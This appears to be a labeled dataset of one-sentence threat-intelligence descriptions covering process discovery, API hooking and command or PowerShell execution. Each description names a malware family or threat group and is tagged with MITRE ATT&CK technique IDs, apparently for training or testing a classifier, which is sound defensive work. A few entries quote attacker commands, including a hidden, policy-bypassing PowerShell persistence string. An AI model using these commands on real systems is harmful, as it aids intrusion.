{"text1":"TrickBot has the ability to capture RDP credentials by capturing the \"CredEnumerateA\" API","labels":"['T1056.004']"}
{"text1":"Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.","labels":"['T1056.004']"}
{"text1":"Zebrocy installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.","labels":"['T1056.004']"}
{"text1":"ZxShell hooks several API functions to spawn system threads.","labels":"['T1056.004']"}
{"text1":"4H RAT has the capability to obtain a listing of running processes (including loaded modules).","labels":"['T1057']"}
{"text1":"APT1 gathered a list of running processes on the system using \"tasklist \/v\".","labels":"['T1057']"}
{"text1":"APT29 has used multiple command-line utilities to enumerate running processes.","labels":"['T1057']"}
{"text1":"APT37's Freenki malware lists running processes using the Microsoft Windows API.","labels":"['T1057']"}
{"text1":"APT38 leveraged Sysmon to understand the processes, services in the organization.","labels":"['T1057']"}
{"text1":"After compromising a victim, Poseidon Group lists all running processes.","labels":"['T1057']"}
{"text1":"An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.","labels":"['T1057']"}
{"text1":"Andariel has used \"tasklist\" to enumerate processes and find a specific string.","labels":"['T1057']"}
{"text1":"Aria-body has the ability to enumerate loaded modules for a process..","labels":"['T1057']"}
{"text1":"Astaroth searches for different processes on the system.","labels":"['T1057']"}
{"text1":"Avaddon has collected information about running processes.","labels":"['T1057']"}
{"text1":"Avenger has the ability to use Tasklist to identify running processes.","labels":"['T1057']"}
{"text1":"Azorult can collect a list of running processes by calling CreateToolhelp32Snapshot.","labels":"['T1057']"}
{"text1":"BACKSPACE may collect information about running processes.","labels":"['T1057']"}
{"text1":"BBSRAT can list running processes.","labels":"['T1057']"}
{"text1":"BISCUIT has a command to enumerate running processes and identify their owners.","labels":"['T1057']"}
{"text1":"BLACKCOFFEE has the capability to discover processes.","labels":"['T1057']"}
{"text1":"BLUELIGHT can collect process filenames and SID authority level.","labels":"['T1057']"}
{"text1":"Babuk has the ability to check running processes on a targeted system.","labels":"['T1057']"}
{"text1":"BabyShark has executed the \"tasklist\" command.","labels":"['T1057']"}
{"text1":"Backdoor.Oldrea collects information about running processes.","labels":"['T1057']"}
{"text1":"Bad Rabbit can enumerate all running processes to compare hashes.","labels":"['T1057']"}
{"text1":"Bankshot identifies processes and collects the process ids.","labels":"['T1057']"}
{"text1":"Bazar can identity the current process on a compromised host.","labels":"['T1057']"}
{"text1":"Bisonal can obtain a list of running processes on the victim\u2019s machine.","labels":"['T1057']"}
{"text1":"BlackEnergy has gathered a process list by using Tasklist.exe.","labels":"['T1057']"}
{"text1":"Brave Prince lists the running processes.","labels":"['T1057']"}
{"text1":"Bundlore has used the \"ps\" command to list processes.","labels":"['T1057']"}
{"text1":"Cannon can obtain a list of processes running on the system.","labels":"['T1057']"}
{"text1":"Carbanak lists running processes.","labels":"['T1057']"}
{"text1":"Carberp has collected a list of running processes.","labels":"['T1057']"}
{"text1":"Cardinal RAT contains watchdog functionality that ensures its process is always running, else spawns a new instance.","labels":"['T1057']"}
{"text1":"Caterpillar WebShell can gather a list of processes running on the machine.","labels":"['T1057']"}
{"text1":"ChChes collects its process identifier (PID) on the victim.","labels":"['T1057']"}
{"text1":"Chimera has used \"tasklist\" to enumerate processes.","labels":"['T1057']"}
{"text1":"Clambling can enumerate processes on a targeted system.","labels":"['T1057']"}
{"text1":"Clop can enumerate all processes on the victim's machine.","labels":"['T1057']"}
{"text1":"Cobalt Strike's \"beacon\" payload can collect information on process details.","labels":"['T1057']"}
{"text1":"Conti can enumerate through all open processes to search for any that have the string \u201csql\u201d in their process name.","labels":"['T1057']"}
{"text1":"Crimson contains a command to list processes.","labels":"['T1057']"}
{"text1":"Cuba can enumerate processes running on a victim's machine.","labels":"['T1057']"}
{"text1":"DRATzarus can enumerate and examine running processes to determine if a debugger is present.","labels":"['T1057']"}
{"text1":"Dacls can collect data on running and parent processes.","labels":"['T1057']"}
{"text1":"Darkhotel malware can collect a list of running processes on a system.","labels":"['T1057']"}
{"text1":"Derusbi collects current and parent process IDs.","labels":"['T1057']"}
{"text1":"Doki has searched for the current process\u2019s PID.","labels":"['T1057']"}
{"text1":"Donut includes subprojects that enumerate and identify information about Process Injection candidates.","labels":"['T1057']"}
{"text1":"Dtrack\u2019s dropper can list all running processes.","labels":"['T1057']"}
{"text1":"During C0015, the threat actors used the `tasklist \/s` command as well as `taskmanager` to obtain a list of running processes.","labels":"['T1057']"}
{"text1":"During Operation Honeybee, the threat actors obtained a list of running processes on a victim machine using `cmd \/c tasklist > %temp%\\temp.ini`.","labels":"['T1057']"}
{"text1":"During Operation Wocao, the threat actors used `tasklist` to collect a list of running processes on an infected system.","labels":"['T1057']"}
{"text1":"DustySky collects information about running processes from victims.","labels":"['T1057']"}
{"text1":"Elise enumerates processes via the \"tasklist\" command.","labels":"['T1057']"}
{"text1":"Epic uses the \"tasklist \/v\" command to obtain a list of processes.","labels":"['T1057']"}
{"text1":"EvilBunny has used EnumProcesses() to identify how many process are running in the environment.","labels":"['T1057']"}
{"text1":"FELIXROOT collects a list of running processes.","labels":"['T1057']"}
{"text1":"Flagpro has been used to run the \"tasklist\" command on a compromised system.","labels":"['T1057']"}
{"text1":"FrameworkPOS can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.","labels":"['T1057']"}
{"text1":"Frankenstein has enumerated hosts, looking to obtain a list of all currently running processes.","labels":"['T1057']"}
{"text1":"FruitFly has the ability to list processes on the system.","labels":"['T1057']"}
{"text1":"FunnyDream has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`.","labels":"['T1057']"}
{"text1":"Fysbis can collect information about running processes.","labels":"['T1057']"}
{"text1":"Gamaredon Group has used tools to enumerate processes on target hosts including Process Explorer.","labels":"['T1057']"}
{"text1":"Gelsemium can enumerate running processes.","labels":"['T1057']"}
{"text1":"GeminiDuke collects information on running processes and environment variables from the victim.","labels":"['T1057']"}
{"text1":"Gold Dragon checks the running processes on the victim\u2019s machine.","labels":"['T1057']"}
{"text1":"Goopy has checked for the Google Updater process to ensure Goopy was loaded properly.","labels":"['T1057']"}
{"text1":"Grandoreiro can identify installed security tools based on process names.","labels":"['T1057']"}
{"text1":"HALFBAKED can obtain information about running processes on the victim.","labels":"['T1057']"}
{"text1":"HELLOKITTY can search for specific processes to terminate.","labels":"['T1057']"}
{"text1":"HEXANE has enumerated processes on targeted systems.","labels":"['T1057']"}
{"text1":"Helminth has used Tasklist to get information on processes.","labels":"['T1057']"}
{"text1":"Heyoka Backdoor can gather process information.","labels":"['T1057']"}
{"text1":"Higaisa\u2019s shellcode attempted to find the process ID of the current process.","labels":"['T1057']"}
{"text1":"Honeybee gathers a list of processes using the \"tasklist\" command and then is sent back to the control server.","labels":"['T1057']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can monitor processes.","labels":"['T1057']"}
{"text1":"Inception has used a reconnaissance module to identify active processes and other associated loaded modules.","labels":"['T1057']"}
{"text1":"InvisiMole can obtain a list of running processes.","labels":"['T1057']"}
{"text1":"IronNetInjector can identify processes via C# methods such as \"GetProcessesByName\" and running Tasklist with the Python \"os.popen\" function.","labels":"['T1057']"}
{"text1":"Ixeshe can list running processes.","labels":"['T1057']"}
{"text1":"JHUHUGIT obtains a list of running processes on the victim.","labels":"['T1057']"}
{"text1":"Javali can monitor processes for open browsers and custom banking applications.","labels":"['T1057']"}
{"text1":"KEYMARBLE can obtain a list of running processes on the system.","labels":"['T1057']"}
{"text1":"KONNI has used the command \"cmd \/c tasklist\" to get a snapshot of the current processes on the target machine.","labels":"['T1057']"}
{"text1":"Kasidet has the ability to search for a given process name in processes currently running in the system.","labels":"['T1057']"}
{"text1":"Ke3chang performs process discovery using \"tasklist\" commands.","labels":"['T1057']"}
{"text1":"Kimsuky can gather a list of all processes running on a victim's machine.","labels":"['T1057']"}
{"text1":"Kinsing has used ps to list processes.","labels":"['T1057']"}
{"text1":"Kwampirs collects a list of running services with the command \"tasklist \/v\".","labels":"['T1057']"}
{"text1":"LookBack can list running processes.","labels":"['T1057']"}
{"text1":"LoudMiner used the \"ps\" command to monitor the running processes on the system.","labels":"['T1057']"}
{"text1":"Lucifer can identify the process that owns remote connections.","labels":"['T1057']"}
{"text1":"MacMa can enumerate running processes.","labels":"['T1057']"}
{"text1":"Machete has a component to check for running processes to look for web browsers.","labels":"['T1057']"}
{"text1":"Magic Hound malware can list running processes.","labels":"['T1057']"}
{"text1":"MarkiRAT can search for different processes on a system.","labels":"['T1057']"}
{"text1":"Maze has gathered all of the running system processes.","labels":"['T1057']"}
{"text1":"Meteor can check if a specific process is running, such as Kaspersky's `avp.exe`.","labels":"['T1057']"}
{"text1":"MobileOrder has a command to upload information about all running processes to its C2 server.","labels":"['T1057']"}
{"text1":"Mosquito runs \"tasklist\" to obtain running processes.","labels":"['T1057']"}
{"text1":"MuddyWater has used malware to obtain a list of running processes on the system.","labels":"['T1057']"}
{"text1":"NavRAT uses \"tasklist \/v\" to check running processes.","labels":"['T1057']"}
{"text1":"Nebulae can enumerate processes on a target system.","labels":"['T1057']"}
{"text1":"ObliqueRAT can check for blocklisted process names on a compromised host.","labels":"['T1057']"}
{"text1":"OceanSalt can collect the name and ID for every process running on the system.","labels":"['T1057']"}
{"text1":"OilRig has run \"tasklist\" on a victim's machine.","labels":"['T1057']"}
{"text1":"Orz can gather a process list from the victim.","labels":"['T1057']"}
{"text1":"OutSteel can identify running processes on a compromised host.","labels":"['T1057']"}
{"text1":"P8RAT can check for specific processes associated with virtual environments.","labels":"['T1057']"}
{"text1":"PLAINTEE performs the \"tasklist\" command to list running processes.","labels":"['T1057']"}
{"text1":"PLEAD has the ability to list processes on the compromised host.","labels":"['T1057']"}
{"text1":"POORAIM can enumerate processes.","labels":"['T1057']"}
{"text1":"POWERSTATS has used \"get_tasklist\" to discover processes on the compromised host.","labels":"['T1057']"}
{"text1":"POWRUNER may collect process information by running \"tasklist\" on a victim.","labels":"['T1057']"}
{"text1":"Pandora can monitor processes on a compromised host.","labels":"['T1057']"}
{"text1":"Pasam creates a backdoor through which remote attackers can retrieve lists of running processes.","labels":"['T1057']"}
{"text1":"PcShare can obtain a list of running processes on a compromised host.","labels":"['T1057']"}
{"text1":"Pillowmint can iterate through running processes every six seconds collecting a list of processes to capture from later.","labels":"['T1057']"}
{"text1":"PipeMon can iterate over the running processes to find a suitable injection target.","labels":"['T1057']"}
{"text1":"PlugX has a module to list the processes running on a machine.","labels":"['T1057']"}
{"text1":"PoetRAT has the ability to list all running processes.","labels":"['T1057']"}
{"text1":"PowerDuke has a command to list the victim's processes.","labels":"['T1057']"}
{"text1":"PowerSploit's \"Get-ProcessTokenPrivilege\" Privesc-PowerUp module can enumerate privileges for a given process.","labels":"['T1057']"}
{"text1":"Proxysvc lists processes running on the system.","labels":"['T1057']"}
{"text1":"Pupy can list the running processes and get the process ID and parent process\u2019s ID.","labels":"['T1057']"}
{"text1":"QakBot has the ability to check running processes.","labels":"['T1057']"}
{"text1":"RATANKBA lists the system\u2019s processes.","labels":"['T1057']"}
{"text1":"ROKRAT can list the current running processes on the system.","labels":"['T1057']"}
{"text1":"RTM can obtain information about process integrity levels.","labels":"['T1057']"}
{"text1":"RainyDay can enumerate processes on a target system.","labels":"['T1057']"}
{"text1":"Ramsay can gather a list of running processes by using Tasklist.","labels":"['T1057']"}
{"text1":"Rising Sun can enumerate all running processes and process information on an infected machine.","labels":"['T1057']"}
{"text1":"Rocke can detect a running process's PID on the infected machine.","labels":"['T1057']"}
{"text1":"RogueRobin checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.","labels":"['T1057']"}
{"text1":"Ryuk has called \"CreateToolhelp32Snapshot\" to enumerate all running processes.","labels":"['T1057']"}
{"text1":"SDBbot can enumerate a list of running processes on a compromised machine.","labels":"['T1057']"}
{"text1":"SHOTPUT has a command to obtain a process listing.","labels":"['T1057']"}
{"text1":"SILENTTRINITY can enumerate processes, including properties to determine if they have the Common Language Runtime (CLR) loaded.","labels":"['T1057']"}
{"text1":"SLOTHFULMEDIA has enumerated processes by ID, name, or privileges.","labels":"['T1057']"}
{"text1":"SUNBURST collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.","labels":"['T1057']"}
{"text1":"SUNSPOT monitored running processes for instances of \"MsBuild.exe\" by hashing the name of each running process and comparing it to the corresponding value \"0x53D525\". It also extracted command-line arguments and individual arguments from the running \"MsBuild.exe\" process to identify the directory path of the Orion software Visual Studio solution.","labels":"['T1057']"}
{"text1":"SYSCON has the ability to use Tasklist to list running processes.","labels":"['T1057']"}
{"text1":"Saint Bot has enumerated running processes on a compromised host to determine if it is running under the process name `dfrgui.exe`.","labels":"['T1057']"}
{"text1":"Seasalt has a command to perform a process listing.","labels":"['T1057']"}
{"text1":"ShadowPad has collected the PID of a malicious process.","labels":"['T1057']"}
{"text1":"ShimRatReporter listed all running processes on the machine.","labels":"['T1057']"}
{"text1":"Sidewinder has used tools to identify running processes on the victim's machine.","labels":"['T1057']"}
{"text1":"Skidmap has monitored critical processes to ensure resiliency.","labels":"['T1057']"}
{"text1":"Socksbot can list all running processes.","labels":"['T1057']"}
{"text1":"SodaMaster can search a list of running processes.","labels":"['T1057']"}
{"text1":"SoreFang can enumerate processes on a victim machine through use of Tasklist.","labels":"['T1057']"}
{"text1":"StrongPity can determine if a user is logged in by checking to see if explorer.exe is running.","labels":"['T1057']"}
{"text1":"Sykipot may gather a list of running processes by running \"tasklist \/v\".","labels":"['T1057']"}
{"text1":"TAINTEDSCRIBE can execute \"ProcessList\" for process discovery.","labels":"['T1057']"}
{"text1":"TSCookie has the ability to list processes on the infected host.","labels":"['T1057']"}
{"text1":"TajMahal has the ability to identify running processes and associated plugins on an infected host.","labels":"['T1057']"}
{"text1":"Tasklist can be used to discover processes running on a system.","labels":"['T1057']"}
{"text1":"TeamTNT has searched for rival malware and removes it if found. TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.","labels":"['T1057']"}
{"text1":"The OsInfo function in Komplex collects a running process list.","labels":"['T1057']"}
{"text1":"The discovery modules used with Duqu can collect information on process details.","labels":"['T1057']"}
{"text1":"ThiefQuest obtains a list of running processes using the function \"kill_unwanted\".","labels":"['T1057']"}
{"text1":"TrickBot uses module networkDll for process list discovery.","labels":"['T1057']"}
{"text1":"Trojan.Karagany can use Tasklist to collect a list of running tasks.","labels":"['T1057']"}
{"text1":"Tropic Trooper is capable of enumerating the running processes on the system using \"pslist\".","labels":"['T1057']"}
{"text1":"UBoatRAT can list running processes on the system.","labels":"['T1057']"}
{"text1":"UNC2452 used multiple command-line utilities to enumerate running processes.","labels":"['T1057']"}
{"text1":"USBferry can use \"tasklist\" to gather information about the process running on the infected system.","labels":"['T1057']"}
{"text1":"Ursnif has gathered information about running processes.","labels":"['T1057']"}
{"text1":"VERMIN can get a list of the processes and running tasks on the system.","labels":"['T1057']"}
{"text1":"WINERACK can enumerate processes.","labels":"['T1057']"}
{"text1":"WarzoneRAT can obtain a list of processes on a compromised host.","labels":"['T1057']"}
{"text1":"Windshift has used malware to enumerate active processes.","labels":"['T1057']"}
{"text1":"Winnti Group looked for a specific process running on infected servers.","labels":"['T1057']"}
{"text1":"Winnti for Windows can check if the explorer.exe process is responsible for calling its install function.","labels":"['T1057']"}
{"text1":"Zebrocy uses the \"tasklist\" and \"wmic process get Capture, ExecutablePath\" commands to gather the processes running on the system.","labels":"['T1057']"}
{"text1":"Zeus Panda checks for running processes on the victim\u2019s machine.","labels":"['T1057']"}
{"text1":"Zox has the ability to list processes.","labels":"['T1057']"}
{"text1":"ZxShell has a command, ps, to obtain a listing of processes on the system.","labels":"['T1057']"}
{"text1":"ZxxZ has created a snapshot of running processes using `CreateToolhelp32Snapshot`.","labels":"['T1057']"}
{"text1":"down_new has the ability to list running processes on a compromised host.","labels":"['T1057']"}
{"text1":"gh0st RAT has the capability to list processes.","labels":"['T1057']"}
{"text1":"macOS.OSAMiner has used `ps ax | grep <name> | grep -v grep | ...` and `ps ax | grep -E...` to conduct process discovery.","labels":"['T1057']"}
{"text1":"njRAT can search a list of running processes for Tr.exe.","labels":"['T1057']"}
{"text1":"yty gets an output of running processes using the \"tasklist\" command.","labels":"['T1057']"}
{"text1":"APT19 downloaded and launched code within a SCT file.","labels":"['T1059']"}
{"text1":"APT28 uses cmd.exe to execute commands and custom backdoors.","labels":"['T1059']"}
{"text1":"APT32 has used COM scriptlets to download Cobalt Strike beacons.","labels":"['T1059']"}
{"text1":"APT34 has used the command-line interface for execution.","labels":"['T1059']"}
{"text1":"APT37 has used Ruby scripts to execute payloads.","labels":"['T1059']"}
{"text1":"APT39 has utilized AutoIt and custom scripts to perform internal reconnaissance.","labels":"['T1059']"}
{"text1":"Astaroth spawns a CMD process to execute commands.","labels":"['T1059', 'T1059.003']"}
{"text1":"BRONZE BUTLER uses the command-line interface.","labels":"['T1059']"}
{"text1":"Bonadan can create bind and reverse shells on the infected system.","labels":"['T1059']"}
{"text1":"CHOPSTICK is capable of performing remote command execution.","labels":"['T1059']"}
{"text1":"Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.","labels":"['T1059']"}
{"text1":"Denis can launch a remote shell to execute arbitrary commands on the victim\u2019s machine.","labels":"['T1059', 'T1059.003']"}
{"text1":"Donut can generate shellcode outputs that execute via Ruby.","labels":"['T1059']"}
{"text1":"Dragonfly has used the command line for execution.","labels":"['T1059']"}
{"text1":"Emotet has used cmd.exe to run a PowerShell script.","labels":"['T1059', 'T1059.003']"}
{"text1":"Empire uses a command-line interface to interact with systems.","labels":"['T1059']"}
{"text1":"Exaramel for Windows has a command to launch a remote shell and executes commands on the victim\u2019s machine.","labels":"['T1059', 'T1059.003']"}
{"text1":"FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.","labels":"['T1059']"}
{"text1":"FIN7 used SQL scripts to help perform tasks on the victim's machine.","labels":"['T1059']"}
{"text1":"FIVEHANDS can receive a command line argument to limit file encryption to specified directories.","labels":"['T1059']"}
{"text1":"Fox Kitten has used a Perl reverse shell to communicate with C2.","labels":"['T1059']"}
{"text1":"Get2 has the ability to run executables with command-line arguments.","labels":"['T1059']"}
{"text1":"Imminent Monitor has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.","labels":"['T1059']"}
{"text1":"Kessel can create a reverse shell between the infected host and a specified system.","labels":"['T1059']"}
{"text1":"Lazarus Group malware uses cmd.exe to execute commands on victims.","labels":"['T1059']"}
{"text1":"Malware used by Ke3chang can run commands on the command-line interface.","labels":"['T1059']"}
{"text1":"Matryoshka is capable of providing Meterpreter shell access.","labels":"['T1059']"}
{"text1":"Molerats used various implants, including those built on .NET, on target machines.","labels":"['T1059']"}
{"text1":"MoonWind can execute commands via an interactive command shell.","labels":"['T1059']"}
{"text1":"OSX_OCEANLOTUS.D can run commands through a terminal on the victim\u2019s machine.","labels":"['T1059']"}
{"text1":"OilRig has used the command-line interface for execution.","labels":"['T1059']"}
{"text1":"OilRig has used various types of scripting for execution.","labels":"['T1059']"}
{"text1":"P.A.S. Webshell has the ability to create reverse shells with Perl scripts.","labels":"['T1059']"}
{"text1":"PoetRAT has executed a Lua script through a Lua interpreter for Windows.","labels":"['T1059']"}
{"text1":"Several commands are supported by the Honeybee's implant via the command-line interface and there\u2019s also a utility to execute any custom command on an infected endpoint.","labels":"['T1059']"}
{"text1":"SpeakUp uses Perl scripts.","labels":"['T1059']"}
{"text1":"Stealth Falcon malware uses WMI to script data collection and command execution on the victim.","labels":"['T1059']"}
{"text1":"TYPEFRAME can execute commands using a shell.","labels":"['T1059']"}
{"text1":"WINERACK can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.","labels":"['T1059']"}
{"text1":"Whitefly has used a simple remote shell tool that will call back to the C2 server and wait for commands.","labels":"['T1059']"}
{"text1":"creates a backdoor through which remote attackers can open a command-line interface.","labels":"['T1059', 'T1059']"}
{"text1":"gh0st RAT is able to open a remote shell to execute commands.","labels":"['T1059']"}
{"text1":"AADInternals is written and executed via PowerShell.","labels":"['T1059.001']"}
{"text1":"APT19 used PowerShell commands to execute payloads.","labels":"['T1059.001']"}
{"text1":"APT28 downloads and executes PowerShell scripts and performs PowerShell commands.","labels":"['T1059.001']"}
{"text1":"APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell to create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, and to execute other commands.","labels":"['T1059.001']"}
{"text1":"APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.","labels":"['T1059.001']"}
{"text1":"APT33 has utilized PowerShell to download files from the C2 server and run various scripts.","labels":"['T1059.001']"}
{"text1":"APT38 has used PowerShell to execute commands and other operational tasks.","labels":"['T1059.001']"}
{"text1":"AppleSeed has the ability to execute its payload via PowerShell.","labels":"['T1059.001']"}
{"text1":"Aquatic Panda has downloaded additional scripts and executed Base64 encoded commands in PowerShell.","labels":"['T1059.001']"}
{"text1":"AutoIt backdoor downloads a PowerShell script that decodes to a typical shellcode loader.","labels":"['T1059.001']"}
{"text1":"BRONZE BUTLER has used PowerShell for execution.","labels":"['T1059.001']"}
{"text1":"Bandook has used PowerShell loaders as part of execution.","labels":"['T1059.001']"}
{"text1":"Bazar can execute a PowerShell script received from C2.","labels":"['T1059.001']"}
{"text1":"BloodHound can use PowerShell to pull Active Directory information from the target environment.","labels":"['T1059.001']"}
{"text1":"Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.","labels":"['T1059.001']"}
{"text1":"Bumblebee can use PowerShell for execution.","labels":"['T1059.001']"}
{"text1":"CharmPower can use PowerShell for payload execution and C2 communication.","labels":"['T1059.001']"}
{"text1":"Chimera has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features.","labels":"['T1059.001']"}
{"text1":"Cobalt Group has used powershell.exe to download and execute scripts.","labels":"['T1059.001']"}
{"text1":"ComRAT has used PowerShell to load itself every time a user logs in to the system. ComRAT can execute PowerShell scripts loaded into memory or from the file system.","labels":"['T1059.001']"}
{"text1":"ConnectWise can be used to execute PowerShell commands on target machines.","labels":"['T1059.001']"}
{"text1":"CrackMapExec can execute PowerShell commands via WMI.","labels":"['T1059.001']"}
{"text1":"CreepySnail can use PowerShell for execution, including the cmdlets `Invoke-WebRequst` and `Invoke-Expression`.","labels":"['T1059.001']"}
{"text1":"Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"DarkVishnya used PowerShell to create shellcode loaders.","labels":"['T1059.001']"}
{"text1":"DarkWatchman can execute PowerShell commands and has used PowerShell to execute a keylogger.","labels":"['T1059.001']"}
{"text1":"Denis has a version written in PowerShell.","labels":"['T1059.001']"}
{"text1":"DownPaper uses PowerShell for execution.","labels":"['T1059.001']"}
{"text1":"Dragonfly 2.0 used PowerShell scripts for execution.","labels":"['T1059.001']"}
{"text1":"Dragonfly has used PowerShell scripts for execution.","labels":"['T1059.001']"}
{"text1":"During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.","labels":"['T1059.001']"}
{"text1":"During Operation Wocao, threat actors used PowerShell on compromised systems.","labels":"['T1059.001']"}
{"text1":"Earth Lusca has used PowerShell to execute commands.","labels":"['T1059.001']"}
{"text1":"Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement.","labels":"['T1059.001']"}
{"text1":"Ember Bear has used PowerShell to download and execute malicious code.","labels":"['T1059.001']"}
{"text1":"Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.","labels":"['T1059.001']"}
{"text1":"Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the \"Invoke-PSRemoting\" module.","labels":"['T1059.001']"}
{"text1":"FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.","labels":"['T1059.001']"}
{"text1":"FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.","labels":"['T1059.001']"}
{"text1":"FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload.","labels":"['T1059.001']"}
{"text1":"FIN8's malicious spearphishing payloads are executed as PowerShell. FIN8 has also used PowerShell for lateral movement and credential access.","labels":"['T1059.001']"}
{"text1":"Ferocious can use PowerShell scripts for execution.","labels":"['T1059.001']"}
{"text1":"Fox Kitten has used PowerShell scripts to access credential data.","labels":"['T1059.001']"}
{"text1":"Frankenstein has used PowerShell to run a series of base64-encoded commands, that acted as a stager and enumerated hosts.","labels":"['T1059.001']"}
{"text1":"GALLIUM used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.","labels":"['T1059.001']"}
{"text1":"GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts.","labels":"['T1059.001']"}
{"text1":"Gamaredon Group has used obfuscated PowerShell scripts for staging.","labels":"['T1059.001']"}
{"text1":"HAFNIUM has used the Exchange Power Shell module \"Set-OabVirtualDirectoryPowerShell\" to export mailbox data.","labels":"['T1059.001']"}
{"text1":"HAMMERTOSS is known to use PowerShell.","labels":"['T1059.001']"}
{"text1":"HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.","labels":"['T1059.001']"}
{"text1":"Inception has used PowerShell to execute malicious commands and payloads.","labels":"['T1059.001']"}
{"text1":"Indrik Spider has used PowerShell Empire for execution of malware.","labels":"['T1059.001']"}
{"text1":"JCry has used PowerShell to execute payloads.","labels":"['T1059.001']"}
{"text1":"JSS Loader has the ability to download and execute PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"KOCTOPUS has used PowerShell commands to download additional files.","labels":"['T1059.001']"}
{"text1":"KONNI used PowerShell to download and execute a specific 64-bit version of the malware.","labels":"['T1059.001']"}
{"text1":"KeyBoy uses PowerShell commands to download and execute payloads.","labels":"['T1059.001']"}
{"text1":"Kimsuky has executed a variety of PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"Koadic has used PowerShell to establish persistence.","labels":"['T1059.001']"}
{"text1":"LazyScripter has used PowerShell scripts to execute malicious code.","labels":"['T1059.001']"}
{"text1":"Leviathan has used PowerShell for execution.","labels":"['T1059.001']"}
{"text1":"LitePower can use a PowerShell script to execute commands.","labels":"['T1059.001']"}
{"text1":"Lizar has used PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"Lokibot has used PowerShell commands embedded inside batch scripts.","labels":"['T1059.001']"}
{"text1":"Magic Hound has used PowerShell for execution and privilege escalation.","labels":"['T1059.001']"}
{"text1":"Meteor can use PowerShell commands to disable the network adapters on a victim machines.","labels":"['T1059.001']"}
{"text1":"Mosquito can launch PowerShell Scripts.","labels":"['T1059.001']"}
{"text1":"MuddyWater has used PowerShell for execution.","labels":"['T1059.001']"}
{"text1":"Mustang Panda has used malicious PowerShell scripts to enable execution.","labels":"['T1059.001']"}
{"text1":"Netwalker has been written in PowerShell and executed directly in memory, avoiding detection.","labels":"['T1059.001']"}
{"text1":"Nomadic Octopus has used PowerShell for execution.","labels":"['T1059.001']"}
{"text1":"OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.","labels":"['T1059.001']"}
{"text1":"One version of Helminth uses a PowerShell script.","labels":"['T1059.001']"}
{"text1":"POSHSPY uses PowerShell to execute various commands, one to execute its payload.","labels":"['T1059.001']"}
{"text1":"POWERSOURCE is a PowerShell backdoor.","labels":"['T1059.001']"}
{"text1":"POWERSTATS uses PowerShell for obfuscation and execution.","labels":"['T1059.001']"}
{"text1":"POWERTON is written in PowerShell.","labels":"['T1059.001']"}
{"text1":"POWRUNER is written in PowerShell.","labels":"['T1059.001']"}
{"text1":"PUNCHBUGGY has used PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"PowGoop has the ability to use PowerShell scripts to execute commands.","labels":"['T1059.001']"}
{"text1":"PowerLess is written in and executed via PowerShell without using powershell.exe.","labels":"['T1059.001']"}
{"text1":"PowerShower is a backdoor written in PowerShell.","labels":"['T1059.001']"}
{"text1":"PowerSploit modules are written in and executed via PowerShell.","labels":"['T1059.001']"}
{"text1":"PyDCrypt has attempted to execute with PowerShell.","labels":"['T1059.001']"}
{"text1":"Pysa has used Powershell scripts to deploy its ransomware.","labels":"['T1059.001']"}
{"text1":"QakBot can use PowerShell to download and execute payloads.","labels":"['T1059.001']"}
{"text1":"REvil has used PowerShell to delete volume shadow copies and download files.","labels":"['T1059.001']"}
{"text1":"RogueRobin uses a command prompt to run a PowerShell script from Excel. To assist in establishing persistence, RogueRobin creates \"%APPDATA%\\OneDrive.bat\" and saves the following string to it:\"powershell.exe -WindowStyle Hidden -exec bypass -File \u201c%APPDATA%\\OneDrive.ps1\u201d\".","labels":"['T1059.001']"}
{"text1":"SHARPSTATS has the ability to employ a custom PowerShell script.","labels":"['T1059.001']"}
{"text1":"SMOKEDHAM can execute Powershell commands sent from its C2 server.","labels":"['T1059.001']"}
{"text1":"SQLRat has used PowerShell to create a Meterpreter session.","labels":"['T1059.001']"}
{"text1":"SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket.","labels":"['T1059.001']"}
{"text1":"ServHelper has the ability to execute a PowerShell script to get information from the infected host.","labels":"['T1059.001']"}
{"text1":"SharpStage can execute arbitrary commands with PowerShell.","labels":"['T1059.001']"}
{"text1":"Sidewinder has used PowerShell to drop and execute malware loaders.","labels":"['T1059.001']"}
{"text1":"Socksbot can write and execute PowerShell scripts.","labels":"['T1059.001']"}
